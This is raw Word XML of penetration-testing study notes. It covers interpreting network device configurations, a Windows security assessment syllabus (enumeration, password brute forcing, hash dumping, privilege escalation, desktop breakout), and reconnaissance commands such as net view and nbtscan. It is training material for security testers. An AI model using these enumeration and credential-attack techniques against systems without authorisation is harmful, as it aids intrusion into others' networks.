          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">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login</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transport</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DC7637">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> input telnet ssh</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aux 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session-timeout</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DC7637">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 25</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vty 0 4</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password</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DC7637">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">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login</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transport</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DC7637">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> input 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end</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switch02#</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7637" w:rsidRDefault="00DC7637" w:rsidP="00B12BF6"/>
    <w:p w:rsidR="00B50C46" w:rsidRDefault="00B12BF6" w:rsidP="00B12BF6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>D7b - Interpreting the configuration of other manufacturers’ devices</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B50C46" w:rsidRPr="00DC7637" w:rsidRDefault="00DC7637" w:rsidP="00B50C46">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC7637">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Read it and see but if all else fails use Google and obtain the admin guide.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7637" w:rsidRPr="00DC7637" w:rsidRDefault="00DC7637" w:rsidP="00B50C46">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DC7637" w:rsidRPr="00DC7637" w:rsidRDefault="00DC7637" w:rsidP="00B50C46">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC7637">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Or cheat and use nipper again:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7637" w:rsidRPr="00DC7637" w:rsidRDefault="00DC7637" w:rsidP="00B50C46">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC7637">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Device Switches:</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--ios-switch    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00DC7637">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Cisco IOS-based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--ios-router    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00DC7637">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Cisco IOS-based Router (default)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--ios-catalyst  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00DC7637">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Cisco IOS-based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--pix           </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00DC7637">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Cisco PIX-based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--asa           </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00DC7637">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Cisco ASA-based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--fwsm          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00DC7637">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Cisco FWSM-based Router</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catos</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DC7637">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">         </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00DC7637">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Cisco CatOS-based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--nmp           </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00DC7637">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Cisco NMP-based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--css           </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00DC7637">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Cisco Content Services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--screenos      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00DC7637">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Juniper NetScreen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--passport      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00DC7637">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Nortel Passport Device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--sonicos       </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00DC7637">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>SonicWall SonicOS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--fw1           </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00DC7637">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>CheckPoint Firewall-1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--nokiaip       </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00DC7637">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Nokia IP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--accelar       </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00DC7637">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Bay Networks Accelar</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B50C46" w:rsidRDefault="00B50C46" w:rsidP="00B50C46"/>
    <w:p w:rsidR="00B50C46" w:rsidRPr="00B50C46" w:rsidRDefault="00B50C46" w:rsidP="00B50C46"/>
    <w:p w:rsidR="009B4D72" w:rsidRDefault="009B4D72">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B50C46" w:rsidRDefault="00B50C46">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009B4D72" w:rsidRDefault="009B4D72" w:rsidP="00A42E2F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="009B4D72">
        <w:t>Microsoft Windows Security Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B4D72" w:rsidRDefault="009B4D7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9B4D72" w:rsidRPr="005F25BF" w:rsidTr="000336A2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="57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E1</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Domain Reconnaissance</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domains/workgroups and domain membership within the target network.</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key servers within the target domains.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and analysing internal browse lists.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and analysing accessible SMB shares</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E2</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User Enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5632" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009B4D72" w:rsidRPr="009B4D72" w:rsidRDefault="00A42E2F" w:rsidP="000336A2">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A42E2F">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Identifying user accounts on target systems and domains using NetBIOS, SNMP and LDAP.</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E3</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Active Directory</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Active Directory Roles (Global Catalogue, Master Browser, FSMO)</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Reliance of AD on DNS and LDAP</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009B4D72" w:rsidRP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Group Policy (Local Security Policy)</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E4</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Windows Passwords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Password policies (complexity, lockout policies)</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Account Brute Forcing</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Hash Storage (merits of LANMAN, NTLMv1 / v2)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsid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Offline Password Analysis (rainbow tables / hash brute forcing)</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E5</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Windows Vulnerabilities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remote windows vulnerabilities, particularly those for which robust exploit code exists in the public domain.</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local windows privilege escalation vulnerabilities and techniques.</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post exploitation activities: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obtain password hashes, both from the local SAM and cached credentials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obtaining locally-stored clear-text passwords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crack password hashes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check patch levels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derive list of missing security patches</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009B4D72"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reversion to previous state</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="889"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MC</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A42E2F" w:rsidRDefault="00A42E2F" w:rsidP="00A42E2F">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E6</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Windows Patch Management Strategies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windows patch management strategies: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SMS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SUS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WSUS</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009B4D72"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MBSA</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E7</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Desktop Lockdown</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5632" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00A42E2F" w:rsidRPr="00A42E2F" w:rsidRDefault="00A42E2F" w:rsidP="00A42E2F">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Knowledge and understanding of techniques to break out of a locked down Windows desktop / Citrix environment.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009B4D72" w:rsidRDefault="00A42E2F" w:rsidP="00A42E2F">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lastRenderedPageBreak/>
              <w:t>Privilege escalation techniques.</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E8</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Exchange</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5632" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009B4D72" w:rsidRPr="00A42E2F" w:rsidRDefault="00A42E2F" w:rsidP="000336A2">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attack vectors for Microsoft Exchange Server.</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E9</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Common Windows Applications</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5632" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009B4D72" w:rsidRDefault="00A42E2F" w:rsidP="000336A2">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 xml:space="preserve">Knowledge of significant vulnerabilities in common windows applications for which there is public </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00A42E2F">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>exploit</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00A42E2F">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> code available.</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FA3D71" w:rsidRDefault="00FA3D71" w:rsidP="005F25BF">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FA3D71" w:rsidRDefault="00FA3D71" w:rsidP="00FA3D71">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>E1 - Domain Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA3D71" w:rsidRPr="00FA3D71" w:rsidRDefault="00FA3D71" w:rsidP="00FA3D71">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">E1a - </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA3D71">
        <w:t>Identifying domains/workgroups and domain membe</w:t>
      </w:r>
      <w:r>
        <w:t>rship within the target network</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA3D71" w:rsidRDefault="00FA3D71" w:rsidP="00FA3D71">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FA3D71" w:rsidRDefault="00B40354" w:rsidP="00FA3D71">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Identity</w:t>
      </w:r>
      <w:r w:rsidR="008A0D29">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Windows d</w:t>
      </w:r>
      <w:r w:rsidR="00B84EB3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>omains/workgroups with net view</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B84EB3" w:rsidRPr="004B1539" w:rsidRDefault="00B40354"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c:\ net view /domain</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B40354" w:rsidRDefault="00B40354" w:rsidP="00FA3D71">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00840C67" w:rsidRDefault="00840C67" w:rsidP="00FA3D71">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Domain members:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00840C67" w:rsidRPr="004B1539" w:rsidRDefault="00840C67"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c:\net view /</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&lt;domain name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00840C67" w:rsidRDefault="00840C67" w:rsidP="00FA3D71">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00840C67" w:rsidRDefault="000B0849" w:rsidP="00FA3D71">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A better </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tools</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> is NBTscan th</w:t>
      </w:r>
      <w:r w:rsidR="008A0D29">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>en find domain and netbios name table</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> for each host</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B084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nbtscan</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004B1539">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> –v</w:t>
      </w:r>
      <w:r w:rsidR="007C56AE">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>h</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1539">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> –s: &lt;ipaddress range&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C56AE" w:rsidRPr="004B1539" w:rsidRDefault="007C56AE"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nbtscan</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004B1539">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> –v</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>h -r</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1539">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> –s: &lt;ipaddress range&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">(uses local port udp 137 to find Win95) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B40354" w:rsidRDefault="00B40354" w:rsidP="00FA3D71">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B84EB3" w:rsidRDefault="000B0849" w:rsidP="00FA3D71">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Linux tool:</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–d</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1539">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="004B1539">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>domain list</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–m</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1539">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="004B1539">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>domain list with master browser</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–a</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1539">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="004B1539">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>domain list, master browser , and servers</w:t>
      </w:r>
    </w:p>
